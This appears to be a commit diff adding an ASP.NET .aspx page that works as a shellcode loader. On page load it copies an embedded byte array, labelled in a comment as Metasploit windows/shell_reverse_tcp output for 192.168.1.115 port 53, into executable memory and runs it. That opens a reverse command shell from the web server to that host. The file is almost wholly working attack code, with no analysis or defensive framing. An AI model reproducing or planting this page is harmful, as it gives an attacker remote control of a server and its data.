|
| 1 | +<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %> |
| 2 | + |
| 3 | +<%@ Import Namespace="System" %> |
| 4 | +<%@ Import Namespace="System.Runtime.InteropServices" %> |
| 5 | + |
| 6 | +<script runat="server"> |
| 7 | + delegate int MsfpayloadProc(); |
| 8 | + protected void Page_Load(object sender, EventArgs e) |
| 9 | + { |
| 10 | + byte[] codeBytes = { |
| 11 | + |
| 12 | +//msfpayload windows/shell_reverse_tcp LHOST=192.168.1.115 LPORT=53 X C |
| 13 | +
|
| 14 | +0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89, |
| 15 | +0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b, |
| 16 | +0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28, |
| 17 | +0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c, |
| 18 | +0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d, |
| 19 | +0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52, |
| 20 | +0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78, |
| 21 | +0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20, |
| 22 | +0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49, |
| 23 | +0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac, |
| 24 | +0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75, |
| 25 | +0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75, |
| 26 | +0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66, |
| 27 | +0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3, |
| 28 | +0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, |
| 29 | +0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff, |
| 30 | +0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d, |
| 31 | +0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77, |
| 32 | +0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26, |
| 33 | +0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00, |
| 34 | +0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b, |
| 35 | +0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40, |
| 36 | +0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0, |
| 37 | +0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8, |
| 38 | +0x01,0x73,0x68,0x02,0x00,0x00,0x35,0x89, |
| 39 | +0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5, |
| 40 | +0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c, |
| 41 | +0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5, |
| 42 | +0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64, |
| 43 | +0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6, |
| 44 | +0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7, |
| 45 | +0x44,0x24,0x3c,0x01,0x01,0x8d,0x44,0x24, |
| 46 | +0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56, |
| 47 | +0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56, |
| 48 | +0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89, |
| 49 | +0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08, |
| 50 | +0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5, |
| 51 | +0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff, |
| 52 | +0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0, |
| 53 | +0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, |
| 54 | +0x00,0x53,0xff,0xd5 |
| 55 | + }; |
| 56 | + IntPtr handle = IntPtr.Zero; |
| 57 | + handle = VirtualAlloc( |
| 58 | + IntPtr.Zero, |
| 59 | + codeBytes.Length, |
| 60 | + MEM_COMMIT | MEM_RESERVE, |
| 61 | + PAGE_EXECUTE_READWRITE); |
| 62 | + try |
| 63 | + { |
| 64 | + Marshal.Copy(codeBytes, 0, handle, codeBytes.Length); |
| 65 | + MsfpayloadProc msfpayload |
| 66 | + = Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc; |
| 67 | + msfpayload(); |
| 68 | + } |
| 69 | + finally |
| 70 | + { |
| 71 | + VirtualFree(handle, 0, MEM_RELEASE); |
| 72 | + } |
| 73 | + } |
| 74 | + //Windows API |
| 75 | + [DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")] |
| 76 | + public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect); |
| 77 | + [DllImport("Kernel32.dll", EntryPoint = "VirtualFree")] |
| 78 | + public static extern bool VirtualFree(IntPtr address, int size, uint freeType); |
| 79 | + //flags |
| 80 | + const uint MEM_COMMIT = 0x1000; |
| 81 | + const uint MEM_RESERVE = 0x2000; |
| 82 | + const uint PAGE_EXECUTE_READWRITE = 0x40; |
| 83 | + const uint MEM_RELEASE = 0x8000; |
| 84 | +</script> |
| 85 | + |
0 commit comments